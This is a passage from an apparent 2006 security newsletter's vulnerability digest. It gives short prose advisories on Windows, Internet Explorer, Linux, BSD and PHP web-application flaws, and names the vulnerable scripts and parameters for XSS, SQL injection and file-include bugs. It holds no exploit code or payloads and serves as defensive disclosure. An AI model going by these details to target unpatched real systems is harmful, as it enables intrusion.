Ref: http://www.microsoft.com/technet/security/bulletin/MS06-016.mspx
______________________________________________________________________

06.15.3 CVE: CVE-2006-0012
Platform: Windows
Title: Microsoft Windows Shell COM Object Remote Code Execution
Description: Microsoft Windows Shell is susceptible to a remote code
execution vulnerability due to a flaw in its handling of remote COM
objects. This issue is exploited by creating a website that forces
Windows Explorer to initiate a connection to a remote file server. The
remote file server then causes Windows Explorer to fail in an
unspecified manner, and to then execute remotely-supplied executable
machine code.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-015.mspx
______________________________________________________________________

06.15.4 CVE: CVE-2006-1185
Platform: Other Microsoft Products
Title: Internet Explorer Invalid HTML Parsing Code Execution
Description: Microsoft Internet Explorer is vulnerable to an unspecified
memory corruption issue when parsing invalid HTML, which can lead to code
execution. See Microsoft's advisory for further details.
Ref: http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx
______________________________________________________________________

06.15.5 CVE: CVE-2006-1189
Platform: Other Microsoft Products
Title: Microsoft Internet Explorer Double Byte Character Memory
Corruption
Description: Microsoft Internet Explorer is prone to a memory
corruption vulnerability. This is related to an error in how double
byte character set (DBCS) characters are handled in IP addresses from
rendered HTML content. This could let an attacker corrupt sensitive
variables in memory with attacker specified data. In this manner it
may be possible to execute arbitrary code by overwriting variables
related to program control.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________

06.15.6 CVE: CVE-2006-1190
Platform: Other Microsoft Products
Title: Internet Explorer Erroneous IOleClientSite Data Zone Bypass
Description: Microsoft Internet Explorer is prone to a zone bypass
issue, which is due to the browser returning an erroneous IOleClientSite
when dynamically creating an embedded object. Microsoft has released
security update MS06-013 to address this issue.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________

06.15.7 CVE: CVE-2006-0003
Platform: Other Microsoft Products
Title: Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code
Execution
Description: Microsoft Data Access Components (MDAC) provide
components for database access. The MDAC RDS.Dataspace ActiveX control
is vulnerable to an unspecified remote code execution. Microsoft Data
Access Components (MDAC) versions 2.7 and 2.8 are vulnerable.
Ref: http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx
______________________________________________________________________

06.15.8 CVE: CVE-2006-1192
Platform: Other Microsoft Products
Title: Internet Explorer Persistent Window Content Address Bar
Spoofing
Description: Microsoft Internet Explorer is vulnerable to an address
bar spoofing issue because it is possible for the content of a web
page to persist while the browser window navigates to another site.
Microsoft Internet Explorer versions 6.0 SP2 and earlier are
vulnerable.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________

06.15.9 CVE: CVE-2006-1188
Platform: Other Microsoft Products
Title: Microsoft Internet Explorer HTML Tag Memory Corruption
Description: Microsoft Internet Explorer is prone to a memory
corruption vulnerability. This is related to the handling of certain
HTML tags. This issue could let an attacker corrupt sensitive memory
with attacker specified data. In this manner it may be possible to
execute arbitrary code by overwriting variables related to program
control.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
______________________________________________________________________

06.15.10 CVE: Not Available
Platform: Third Party Windows Apps
Title: TUGZip Remote Directory Traversal
Description: TUGZip is a file-archiving/compression application. It is
affected by a directory traversal issue when the application processes
malicious GZ, JAR, RAR and ZIP archives. TUGZip version 3.4 and
earlier are affected.
Ref: http://www.securityfocus.com/bid/17432
______________________________________________________________________

06.15.11 CVE: CVE-2006-1522
Platform: Linux
Title: Linux Kernel __keyring_search_one Local Denial of Service
Description: The Linux kernel is vulnerable to a local
denial-of-service issue due to the "__keyring_search_one" function
allowing a non-keyring key request. Linux kernel versions 2.6.16.3 and
earlier are vulnerable.
Ref: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=188466
______________________________________________________________________

06.15.12 CVE: Not Available
Platform: Linux
Title: mnoGoSearch-Common Local Database Administrator Password
Disclosure
Description: Debian has a "debconf" utility that is used to ask and
store configuration-related questions when installing packages. The
"debconf" package improperly stores the password for the database
created during the "mnogosearch-common" package installation process
in an insecure "config.dat" file. Please see the referenced advisory
for a list of vulnerable versions.
Ref: http://www.securityfocus.com/bid/17477
______________________________________________________________________

06.15.13 CVE: CVE-2006-0558
Platform: Linux
Title: Linux Kernel Perfmon.c Local Denial of Service
Description: The Linux kernel is prone to a local denial of service
vulnerability. This issue presents itself in "perfmon.c" on IA-64
platforms during exit processing when a task calls
"pfm_context_create()" and "pfm_smpl_buffer_alloc()". An attacker must
interrupt the task and another process must access its "mm_struct" for
this condition to arise.
Ref: http://marc.theaimsgroup.com/?l=linux-ia64&m=113882384921688
______________________________________________________________________

06.15.14 CVE: Not Available
Platform: BSD
Title: NetBSD False Intel Hardware RNG Detection Predictable Random
Number Generation Weakness
Description: NetBSD running on Intel chips provides a driver that
employs the hardware random number generator (RNG) to gather entropy
for the NetBSD kernel random number generator, rnd(4). It is prone to
a predictable key generation weakness due to incorrect Intel hardware
RNG detection. This issue arises on NetBSD systems with i8xx
motherboard chipset for x86 CPUs.
Ref: http://www.securityfocus.com/bid/17496
______________________________________________________________________

06.15.15 CVE: Not Available
Platform: BSD
Title: NetBSD SIOCGIFALIAS IOCTL Local Denial of Service
Description: NetBSD is a Unix operating system. It is vulnerable to a
denial of service issue because it does not handle exceptional
conditions when the SIOCGIFALIAS IOCTL is used to get information
about an alias that does not exist. NetBSD versions 3.0 and earlier
are vulnerable.
Ref: http://www.securityfocus.com/bid/17497/info
______________________________________________________________________

06.15.16 CVE: Not Available
Platform: BSD
Title: NetBSD Sysctl Local Denial of Service
Description: NetBSD is a Unix operating system. It is vulnerable to a
local denial of service issue that arises when the sysctl function
attempts to lock a user-supplied buffer that is used to store the
results without checking the buffer's size. This may cause resource
exhaustion. NetBSD versions 3.0 and earlier are vulnerable.
Ref: http://www.securityfocus.com/bid/17498
______________________________________________________________________

06.15.17 CVE: Not Available
Platform: Solaris
Title: Sun Solaris SH Local Denial of Service
Description: Sun Solaris Bourne shell (sh) is prone to a local denial
of service vulnerability. This vulnerability arises when a local
unprivileged user creates temporary files in an unspecified malicious
manner.
Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102282-1
______________________________________________________________________

06.15.18 CVE: CVE-2006-1782
Platform: Solaris
Title: Sun Solaris LDAP2 RootDN Password Disclosure
Description: Sun Solaris LDAP2 is vulnerable to an information
disclosure issue. Local unprivileged users may discover the Directory
Server root Distinguished Name (rootDN) password if a privileged user
uses the idsconfig command. Solaris versions 8 and 9 are vulnerable.
Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102113-1
______________________________________________________________________

06.15.19 CVE: Not Available
Platform: Unix
Title: Sybase EAServer Manager Connection Cache Password Disclosure
Description: Sybase EAServer is an application server for hosting
business applications. It is vulnerable to a password disclosure
issue through the connection cache. EAServer versions 5.2 and 5.3 are
vulnerable.
Ref: http://www.sybase.com/detail?id=1040117
______________________________________________________________________

06.15.20 CVE: Not Available
Platform: Novell
Title: Novell GroupWise Messenger Accept Language Remote Buffer
Overflow
Description: Novell GroupWise Messenger is an instant-messaging
solution. It is affected by a buffer overflow issue that arises when
the server handles an "Accept-Language" header containing more than 16
bytes of data that doesn't contain any commas or semicolons. Novell
GroupWise Messenger version 2.0 is affected.
Ref: http://www.securityfocus.com/bid/17503
______________________________________________________________________

06.15.21 CVE: CVE-2006-1705
Platform: Cross Platform
Title: Oracle Database Access Restriction Bypass
Description: Oracle Database is vulnerable to an access restriction
bypass issue due to the failure of the application to properly
enforce read-only privileges for user roles with "SELECT" privileges.
Oracle versions 9.2.0.0 through 10.2.0.3 are vulnerable.
Ref: http://www.frsirt.com/english/advisories/2006/1297
______________________________________________________________________

06.15.22 CVE: CVE-2006-0053
Platform: Cross Platform
Title: Imager JPEG and TGA Images Denial of Service
Description: Imager is a Perl module to manipulate various image file
formats. It is affected by a denial of service issue because it fails
to properly handle JPEG images with 2 or 4 channels or TGA files with
2 channels. Imager version 0.50 has been released to address this
issue.
Ref: http://www.securityfocus.com/bid/17415
______________________________________________________________________

06.15.23 CVE: Not Available
Platform: Cross Platform
Title: fbida FBGS Insecure Temporary File Creation
Description: fbida is a set of applications for viewing image files.
The "fbgs" program creates temporary files in an insecure manner and
with insecure file permissions in "/var/tmp" when the "TMPDIR"
environment variable has not been defined. fbida versions 2.03 and
earlier are affected.
Ref: http://www.securityfocus.com/bid/17436
______________________________________________________________________

06.15.24 CVE: Not Available
Platform: Cross Platform
Title: Cyrus SASL Remote Digest-MD5 Denial of Service
Description: SASL is the Simple Authentication and Security Layer, a
method for adding authentication support to connection-based
protocols. Cyrus SASL is affected by a remote denial of service issue
that occurs prior to successful authentication, allowing anonymous
remote attackers to trigger it. Cyrus SASL version 2.1.21 has been
released to fix this issue.
Ref: http://www.securityfocus.com/bid/17446
______________________________________________________________________

06.15.25 CVE: CVE-2004-2655
Platform: Cross Platform
Title: XScreenSaver Local Password Disclosure
Description: XScreenSaver is a screen saver application. It is
vulnerable to a local password disclosure issue due to failing to
properly grab the keyboard of the local user while it locks the
display. XScreenSaver version 4.18 resolves this issue.
Ref: http://www.jwz.org/xscreensaver/changelog.html
______________________________________________________________________

06.15.26 CVE: Not Available
Platform: Cross Platform
Title: Firefox HTML Parsing Null Pointer Dereference Denial of Service
Description: Mozilla Firefox is vulnerable to a remote denial of
service issue when the browser parses certain malformed HTML content.
Mozilla Firefox versions 1.5.0.1 and earlier are vulnerable.
Ref: http://www.securityfocus.com/archive/1/430875
______________________________________________________________________

06.15.27 CVE: CVE-2006-1627
Platform: Cross Platform
Title: Adobe Document Server for Reader Extensions Multiple Remote
Vulnerabilities
Description: Adobe Document Server for Reader Extensions, included
with Graphics Server and Document Server, is prone to multiple
vulnerabilities. Please refer to the link provided for further
details. Adobe Document Server for Reader Extensions version 6.0,
included with Adobe Graphics Server 2.1 and Adobe Document Server 6.0,
is vulnerable.
Ref: http://www.adobe.com/support/techdocs/331915.html
http://www.adobe.com/support/techdocs/322699.html
http://www.adobe.com/support/techdocs/331917.html
______________________________________________________________________

06.15.28 CVE: Not Available
Platform: Cross Platform
Title: W3C Amaya Multiple Remote Buffer Overflow Vulnerabilities
Description: W3C Amaya is a web browser and editor application that is
available for many platforms. It is susceptible to multiple remote
buffer overflow vulnerabilities due to improper bounds checking on
user-supplied data to the "colgroup compact", "textarea rows" and
"legend color" tag arguments. Amaya version 9.4 is affected by these
issues.
Ref: http://www.securityfocus.com/bid/17507
______________________________________________________________________

06.15.29 CVE: CVE-2006-1628
Platform: Cross Platform
Title: Adobe LiveCycle OBSOLETE User Access Validation
Description: Adobe LiveCycle is a process management solution for
document services. It is vulnerable to an access validation issue
because a user who has been marked OBSOLETE can still gain access to
LiveCycle Workflow or LiveCycle Form Manager.
Adobe LiveCycle Workflow and LiveCycle Form Manager 7.01 are
vulnerable.
Ref: http://www.adobe.com/support/techdocs/333036.html
______________________________________________________________________

06.15.30 CVE: Not Available
Platform: Cross Platform
Title: Opera Web Browser Stylesheet Attribute Buffer Overflow
Description: Opera is susceptible to a buffer overflow vulnerability.
This issue presents itself when Opera attempts to parse CSS
stylesheets containing attributes with more than approximately 32768
bytes. An integer conversion operation during a string copy causes an
integer overflow, resulting in unintended portions of memory prior to
the destination buffer being overwritten. Opera version 8.52 is
vulnerable to this issue.
Ref: http://www.securityfocus.com/archive/1/430876
______________________________________________________________________

06.15.31 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: phpMyForum Index.PHP Multiple Cross-Site Scripting
Vulnerabilities
Description: phpMyForum is a web-based forum application. Insufficient
sanitization of the "type" and "page" parameters of "index.php" script
exposes the application to multiple cross-site scripting issues.
phpMyForum version 4.0 is affected.
Ref: http://www.securityfocus.com/bid/17420
______________________________________________________________________

06.15.32 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: PHPWebGallery Multiple Cross-Site Scripting Vulnerabilities
Description: PHPWebGallery is a web-based photo gallery application.
Insufficient sanitization of the "cat", "num" and "search" parameters
of the "category.php" script and the "slideshow", "show_metadata" and
"start" parameters of the "picture.php" script exposes the application
to multiple cross-site scripting issues. PhpWebGallery version 1.4.1
is affected.
Ref: http://www.securityfocus.com/bid/17421
______________________________________________________________________

06.15.33 CVE: CVE-2006-1717
Platform: Web Application - Cross Site Scripting
Title: MyBulletinBoard Newthread.PHP Cross-Site Scripting
Description: MyBulletinBoard is a web-based bulletin board
application. It is vulnerable to a cross-site scripting issue due to
insufficient sanitization of user-supplied input to the "username"
parameter of the "newthread.php" script. MyBulletinBoard version 1.10
is vulnerable.
Ref: http://www.securityfocus.com/archive/1/430464
______________________________________________________________________

06.15.34 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Shadowed Portal Load.PHP Cross-Site Scripting
Description: Shadowed Portal is a web-based content management system.
It is vulnerable to a cross-site scripting issue due to insufficient
sanitization of user-supplied input to the "page" parameter of the
"load.php" script. All versions of Shadowed Portal are considered to
be vulnerable.
Ref: http://liz0zim.no-ip.org/shad0w.txt
______________________________________________________________________

06.15.35 CVE: CVE-2006-1716
Platform: Web Application - Cross Site Scripting
Title: MyBulletinBoard Multiple HTML Injection Vulnerabilities
Description: MyBulletinBoard is a bulletin board application
implemented in PHP. It is prone to multiple HTML-injection
vulnerabilities due to insufficient sanitization of user-supplied
input to the "Email" and "IMG" BBCode tags.
Ref: http://www.securityfocus.com/archive/1/430344
______________________________________________________________________

06.15.36 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TalentSoft Web+ Shop Deptname Parameter Cross-Site Scripting
Description: TalentSoft Web+ Shop is a web-based ecommerce solution.
It is vulnerable to a cross-site scripting issue due to insufficient
sanitization of user-supplied input to the "deptname" parameter.
TalentSoft Web+ Shop versions 5.0 and earlier are vulnerable.
Ref: http://pridels.blogspot.com/2006/04/web-shop-50-xss.html
______________________________________________________________________

06.15.37 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: JBook Index.PHP Cross-Site Scripting
Description: JBook is a web-based guestbook application implemented in
PHP. It is prone to a cross-site scripting vulnerability due to
insufficient sanitization of user-supplied input to the "page"
parameter of "index.php". JBook version 1.3 is reported to be
vulnerable.
Ref: http://www.securityfocus.com/bid/17419
______________________________________________________________________

06.15.38 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Gallery Unspecified Cross-Site Scripting
Description: Gallery is a web-based photo gallery application.
Insufficient sanitization of user-supplied input exposes the
application to a cross-site scripting issue. Gallery version 1.5.3 has
been released to address this issue.
Ref: http://www.securityfocus.com/bid/17437
______________________________________________________________________

06.15.39 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: XMB Forum Flash Video Cross-Site Scripting
Description: XMB Forum is a web-based message board application. It is
prone to a cross-site scripting vulnerability due to insufficient
sanitization of user-supplied input to Flash videos. An attacker can
execute JavaScript by using "ActionScript", a built-in language of
Flash. XMB Forum version 1.9.5 is affected.
Ref: http://www.securityfocus.com/bid/17445
______________________________________________________________________

06.15.40 CVE: CVE-2006-1759
Platform: Web Application - Cross Site Scripting
Title: SWSoft Confixx Jahr Parameter Cross-Site Scripting
Description: Confixx is a control panel system for Web sites. It is
vulnerable to a cross-site scripting issue due to insufficient
sanitization of user-supplied input to the "jahr" parameter of the
"allgemein_transfer.php" script. SWSoft Confixx 3.1.2 is vulnerable.
Ref: http://www.frsirt.com/english/advisories/2006/1331
______________________________________________________________________

06.15.41 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilities
Description: JetPhoto is a web-based photo gallery application. It is
vulnerable to multiple cross-site scripting issues due to insufficient
sanitization of user-supplied input to the "page" parameter of the
"thumbnail.php", "gallery.php" and "detail.php" scripts, and the
"name" parameter of the "slideshow.php" script. JetPhoto versions
2.1 and earlier are vulnerable.
Ref: http://www.securityfocus.com/bid/17449/info
______________________________________________________________________

06.15.42 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Tritanium Bulletin Board Multiple Cross-Site Scripting
Vulnerabilities
Description: Tritanium Bulletin Board is a bulletin board application.
It is vulnerable to multiple cross-site scripting issues due to
insufficient sanitization of user-supplied input to the
"newuser_name", "newuser_email", and "newuser_hp" parameters of the
"index.php" script. Tritanium Bulletin Board version 1.2.3 is
vulnerable.
Ref: http://www.securityfocus.com/archive/1/430669
______________________________________________________________________

06.15.43 CVE: CVE-2006-1562
Platform: Web Application - Cross Site Scripting
Title: Manila Multiple Cross-Site Scripting Vulnerabilities
Description: Manila is a web-log application written for the MacOS and
Microsoft Windows platforms. It is prone to multiple cross-site
scripting vulnerabilities. Manila versions 9.5 and prior are
vulnerable.
Ref: http://www.securityfocus.com/archive/1/430668
______________________________________________________________________

06.15.44 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Autogallery Multiple Cross-Site Scripting Vulnerabilities
Description: Autogallery is a news reader application. It is
vulnerable to multiple cross-site scripting issues due to insufficient
sanitization of user-supplied input to the "pic" and "show" parameters
of the "index.php" script. AutoGallery version 0.41 is vulnerable.
Ref: http://www.securityfocus.com/bid/17480/info
______________________________________________________________________

06.15.45 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: interaktiv.shop Multiple Cross-Site Scripting Vulnerabilities
Description: interaktiv.shop is a shopping cart application.
Insufficient sanitization of the "interaktiv.shop" script and the "pn"
and "sbeg" parameters of the "shop_main.cgi" script exposes the
application to a cross-site scripting issue. interaktiv.shop versions
5 and earlier are affected.
Ref: http://www.securityfocus.com/bid/17485
______________________________________________________________________

06.15.46 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: phpMyAdmin SQL.PHP Cross-Site Scripting
Description: phpMyAdmin is a web-based administration tool for MySQL
databases. It is affected by a cross-site scripting issue due to
insufficient sanitization of user-supplied input to the "sql_query"
parameter of the "sql.php" script. phpMyAdmin version 2.7-pl1 is
affected.
Ref: http://www.securityfocus.com/bid/17487
______________________________________________________________________

06.15.47 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: MyBB Member.PHP Cross-Site Scripting
Description: MyBB is prone to a cross-site scripting vulnerability due
to improper sanitization of user-supplied input. Since the "url"
parameter is not properly sanitized when submitted to the "member.php"
script, an attacker can submit malicious HTML and script code. MyBB
version 1.10 is vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/bid/17492/exploit
______________________________________________________________________

06.15.48 CVE: CVE-2006-1779
Platform: Web Application - Cross Site Scripting
Title: Simplog Login.PHP Cross-Site Scripting
Description: Simplog is a web log application, written in PHP. Simplog
is prone to a cross-site scripting vulnerability due to insufficient
sanitization of user-supplied input to the "btag" parameter of the
"login.php" script.
Ref: http://milw0rm.com/exploits/1663
______________________________________________________________________

06.15.49 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: PatroNet CMS Index.PHP Cross-Site Scripting
Description: PatroNet CMS is a content management application. It is
prone to a cross-site scripting vulnerability due to insufficient
sanitization of user-supplied input to the "index.php" script.
Ref: http://www.securityfocus.com/bid/17495
______________________________________________________________________

06.15.50 CVE: Not Available
Platform: Web Application - SQL Injection
Title: XBrite Members.PHP SQL Injection
Description: XBrite is a web-based application. Insufficient
sanitization of the "id" parameter of the "members.php" script exposes
the application to a SQL injection issue. XBrite version 1.1 is
affected.
Ref: http://www.securityfocus.com/bid/17421
______________________________________________________________________

06.15.51 CVE: Not Available
Platform: Web Application - SQL Injection
Title: APT-webshop Modules.PHP Multiple SQL Injection Vulnerabilities
Description: APT-webshop is a shopping cart application. It is
vulnerable to multiple SQL injection issues due to insufficient
sanitization of user-supplied input to the "id", "seite" and "group"
parameters of the "modules.php" script. APT-webshop versions 3.0
light, 3.0 basic, and 4.0 pro are vulnerable.
Ref: http://pridels.blogspot.com/2006/04/apt-webshop-system-vuln.html
______________________________________________________________________

06.15.52 CVE: Not Available
Platform: Web Application - SQL Injection
Title: dnGuestbook Admin.PHP SQL Injection Vulnerabilities
Description: dnGuestbook is a guestbook script for websites
implemented in PHP. It is prone to SQL injection vulnerabilities due
to insufficient sanitization of user-supplied input to the "mail" and
"id" parameters of the "admin.php" script. dnGuestbook version 2.0 is
vulnerable.
Ref: http://www.securityfocus.com/bid/17435
______________________________________________________________________

06.15.53 CVE: Not Available
Platform: Web Application - SQL Injection
Title: ShopWeezle Multiple SQL Injection Vulnerabilities
Description: ShopWeezle is an e-commerce application. It is vulnerable
to multiple SQL injection issues due to insufficient sanitization of
user-supplied input to the "logon.php", "index.php" and "memo.php"
scripts. ShopWeezle version 2.0 is vulnerable.
Ref:
http://pridels.blogspot.com/2006/04/shopweezle-20-multiple-vuln.html
______________________________________________________________________

06.15.54 CVE: CVE-2006-1708
Platform: Web Application - SQL Injection
Title: Clansys Index.PHP SQL Injection
Description: Clansys is a web-based application. It is vulnerable to
an SQL injection issue due to insufficient sanitization of
user-supplied input to the "showid" parameter of the "index.php"
script. Clansys version 1.1 is vulnerable.
Ref: http://www.securityfocus.com/bid/17456/discuss
______________________________________________________________________

06.15.55 CVE: CVE-2006-1743
Platform: Web Application - SQL Injection
Title: JBook Form.PHP SQL Injection Vulnerabilities
Description: JBook is a web-based guestbook application implemented in
PHP. It is prone to SQL injection vulnerabilities due to improper
sanitization of user-supplied input to the "mail" and "nom" parameters
of the "form.php" script.
Ref: http://www.securityfocus.com/bid/17458
______________________________________________________________________

06.15.56 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Dokeos Viewtopic.PHP SQL Injection
Description: Dokeos is a web-based e-learning and course management
application. Insufficient sanitization of the "topic" parameter of the
"viewtopic.php" script exposes the application to a SQL injection
issue. All current versions are affected.
Ref: http://www.securityfocus.com/bid/17463
______________________________________________________________________

06.15.57 CVE: CVE-2006-1773
Platform: Web Application - SQL Injection
Title: PHPKIT Include.PHP SQL Injection
Description: PHPKIT is a web-based e-learning and course management
application implemented in PHP. It is prone to an SQL injection
vulnerability due to insufficient sanitization of user-supplied input
to the "contentid" parameter of the "include.php" script.
Ref: http://www.securityfocus.com/bid/17467
______________________________________________________________________

06.15.58 CVE: Not Available
Platform: Web Application - SQL Injection
Title: SWSoft Confixx Index.PHP SQL Injection
Description: Confixx is a web-based control panel application
implemented in PHP. It is prone to an SQL injection vulnerability due
to insufficient sanitization of user-supplied input to the "SID"
parameter of the "index.php" script. SWSoft Confixx versions 3.1.2,
3.0.8 and 3.0.6 are affected.
Ref: http://www.securityfocus.com/bid/17476
______________________________________________________________________

06.15.59 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Chipmunk Guestbook Index.PHP SQL Injection
Description: Chipmunk Guestbook is a guest book application
implemented in PHP. It is prone to an SQL injection vulnerability due
to insufficient sanitization of user-supplied input to the "username"
parameter of the "index.php" script. Chipmunk Guestbook version 1.3 is
affected.
Ref: http://www.securityfocus.com/bid/17483
______________________________________________________________________

06.15.60 CVE: CVE-2006-1778
Platform: Web Application - SQL Injection
Title: Simplog Multiple SQL Injection Vulnerabilities
Description: Simplog is a web-based news application. It is vulnerable
to multiple SQL injection issues due to insufficient sanitization of
user-supplied input to the "index.php" script. Simplog version 0.9.2
is vulnerable.
Ref: http://milw0rm.com/exploits/1663
______________________________________________________________________

06.15.61 CVE: Not Available
Platform: Web Application - SQL Injection
Title: PHP121 PHP121LOGIN.PHP SQL Injection
Description: PHP121 is a web-based instant messaging application. It
is vulnerable to an SQL injection issue due to insufficient
sanitization of input to the "php121login.php" script. PHP121 version
1.4 is vulnerable.
Ref:
http://downloads.securityfocus.com/vulnerabilities/exploits/PHP121_poc
______________________________________________________________________

06.15.62 CVE: CVE-2006-1746
Platform: Web Application
Title: PHPList Index.PHP Local File Include
Description: PHPList is a web-based utility to manage personalized
mailing and customer lists. It is prone to a local file include
vulnerability. The problem presents itself in "lists/index.php" when
the "GLOBALS[database_module]" is not properly sanitized of directory
traversal sequences.
Ref: http://www.securityfocus.com/archive/1/430597
______________________________________________________________________

06.15.63 CVE: Not Available
Platform: Web Application
Title: SIRE Arbitrary File Upload
Description: SIRE is a content management web application implemented
in PHP. It is prone to an arbitrary file upload vulnerability because
input to the "upload.php" script is not properly sanitized, allowing
arbitrary files to be uploaded to the webroot. SIRE version 2.0 is
affected.
Ref: http://www.securityfocus.com/bid/17431
______________________________________________________________________

06.15.64 CVE: CVE-2006-1702
Platform: Web Application
Title: SPIP Spip_login.PHP Remote File Include
Description: SPIP is a website publishing application. It is
vulnerable to a remote file include issue due to insufficient
sanitization of user-supplied input to the "url" variable of the
"spip_login.php" script. SPIP version 1.8.3 is vulnerable.
Ref: http://www.securityfocus.com/bid/17423/info
______________________________________________________________________

06.15.65 CVE: Not Available
Platform: Web Application
Title: VegaDNS Multiple Input Validation Vulnerabilities
Description: VegaDNS is a tinyDNS administration application. It is
vulnerable to multiple input validation issues due to insufficient
sanitization of user-supplied input to the "index.php" and "users.php"
scripts. VegaDNS version 0.9.9 is vulnerable.
Ref: http://www.securityfocus.com/archive/1/430474
______________________________________________________________________

06.15.66 CVE: CVE-2006-1610
Platform: Web Application
Title: SQuery LibPath Parameter Multiple Remote File Include
Vulnerabilities
Description: SQuery is a game server and query module. SQuery is prone
to multiple remote file include vulnerabilities due to insufficient
sanitization of user-supplied input to the "libpath" parameter of
various scripts.
Ref: http://liz0zim.no-ip.org/alp.txt
______________________________________________________________________

06.15.67 CVE: CVE-2006-1700
Platform: Web Application
Title: AWeb's Scripts Seller Buy.PHP Authorization Bypass
Description: AWeb's Scripts Seller is a web-based application for
selling code. It is vulnerable to an authorization bypass issue due to
predictable cookie data. Currently all versions of AWeb's Scripts
Seller are vulnerable.
Ref: http://www.securityfocus.com/bid/17417/info
______________________________________________________________________

06.15.68 CVE: CVE-2006-1697
Platform: Web Application
Title: Matt Wright Guestbook Guestbook.PL Multiple HTML Injection
Vulnerabilities
Description: Matt Wright's Guestbook is a guest book application. It
is vulnerable to multiple HTML injection issues due to insufficient
sanitization of user-supplied input to the "guestbook.pl" script. Matt
Wright's GuestBook version 2.3.1 is vulnerable.
Ref: http://liz0zim.no-ip.org/mattguestbook.html
______________________________________________________________________

06.15.69 CVE: CVE-2006-1608, CVE-2006-1494
Platform: Web Application
Title: PHP Multiple Safe_Mode and Open_Basedir Restriction Bypass
Vulnerabilities
Description: PHP is a general purpose web scripting language. It is
vulnerable to multiple "safe_mode" and "open_basedir" restriction
bypass issues. PHP versions 4.4.2 and 5.1.2 are vulnerable.
Ref: http://www.securityfocus.com/archive/1/430461
______________________________________________________________________

06.15.70 CVE: CVE-2006-1747
Platform: Web Application
Title: VWar Admin.PHP Remote File Include
Description: VWar is a team organizer application written in PHP. VWar
is prone to a remote file include vulnerability. The application fails
to properly sanitize user-supplied input to the "vwar_root" parameter
of the "admin.php" script.
Ref: http://www.milw0rm.com/exploits/1658
______________________________________________________________________

06.15.71 CVE: CVE-2006-1770
Platform: Web Application
Title: AzDGVote Remote File Include
Description: AzDGVote is a web-based voting application. AzDGVote is
prone to a remote file include vulnerability because the application
fails to properly sanitize user-supplied input to the "int_path"
parameter of the "view.php", "vote.php", "admin.php", and
"/admin/index.php" scripts.
Ref: http://www.securityfocus.com/bid/17447
______________________________________________________________________

06.15.72 CVE: CVE-2006-1749
Platform: Web Application
Title: SmartISoft phpListPro Config.PHP Remote File Include
Description: SmartISoft phpListPro is a web-based top site
application. It is vulnerable to a remote file include issue due to
insufficient sanitization of user-supplied input to the "returnpath"
parameter of the "config.php" script. SmartISoft phpListPro versions
2.0 and earlier are vulnerable.
Ref: http://www.securityfocus.com/archive/1/430614
______________________________________________________________________

06.15.73 CVE: Not Available
Platform: Web Application
Title: Clever Copy Connect.INC Information Disclosure
Description: Clever Copy is a website portal and news posting system.
It is prone to an information disclosure vulnerability because the
contents of the "connect.inc" file can be viewed by remote,
unprivileged users. Sensitive configuration information, such as the
username and password for the back end database administrator account,
can be obtained from this file. Clever Copy version 3.0 is affected.
Ref: http://www.securityfocus.com/bid/17461
______________________________________________________________________

06.15.74 CVE: Not Available
Platform: Web Application
Title: Blursoft Blur6ex Multiple Input Validation Vulnerabilities
Description: Blur6ex is a web-based blog and content management system
implemented in PHP. It is prone to multiple input-validation
vulnerabilities.
Ref: http://www.securityfocus.com/archive/1/430607
______________________________________________________________________

06.15.75 CVE: CVE-2006-0164
Platform: Web Application
Title: Phgstats Phgstats.Inc.PHP Remote File Include
Description: Phgstats is a gameserver status script. It is affected by
a remote file include issue due to insufficient sanitization of the
"phgdir" variable in the "phgstats.inc.php" script. Phgstats version
0.5.2 has been released to address this issue.
Ref: http://www.securityfocus.com/bid/17469
______________________________________________________________________

06.15.76 CVE: CVE-2006-1767
Platform: Web Application
Title: Indexu Multiple Remote File Include Vulnerabilities
Description: The "indexu" application is software for creating
indexing websites through managing and organizing links. The "indexu"
application is prone to multiple remote file include vulnerabilities.
These issues are reported to affect versions 5.0.0 and 5.0.1.
Ref: http://www.securityfocus.com/archive/1/430599
______________________________________________________________________

06.15.77 CVE: Not Available
Platform: Web Application
Title: Saxopress URL Parameter Directory Traversal
Description: SAXoPRESS is a web content management system. It is prone
to a directory traversal vulnerability due to improper sanitization of
user-supplied input. The problem occurs with specially crafted HTTP
GET requests containing directory traversal strings supplied through
the "url" parameter.
Ref: http://www.securityfocus.com/bid/17474/exploit
______________________________________________________________________

06.15.78 CVE: Not Available
Platform: Web Application
Title: MvBlog Multiple Input Validation Vulnerabilities
Description: MvBlog is a web log application implemented in PHP. It is
prone to multiple input validation vulnerabilities due to improper
sanitization of user-supplied input. MvBlog version 1.5 is affected.
Ref: http://www.securityfocus.com/bid/17481
______________________________________________________________________

06.15.79 CVE: CVE-2006-1711
Platform: Web Application
Title: Plone MembershipTool Access Control Bypass
Description: Plone is a content management system developed for the
Zope web application platform. It is susceptible to a remote access
control bypass vulnerability due to improper enforcement of privileges
on various MembershipTool methods. This issue allows remote, anonymous
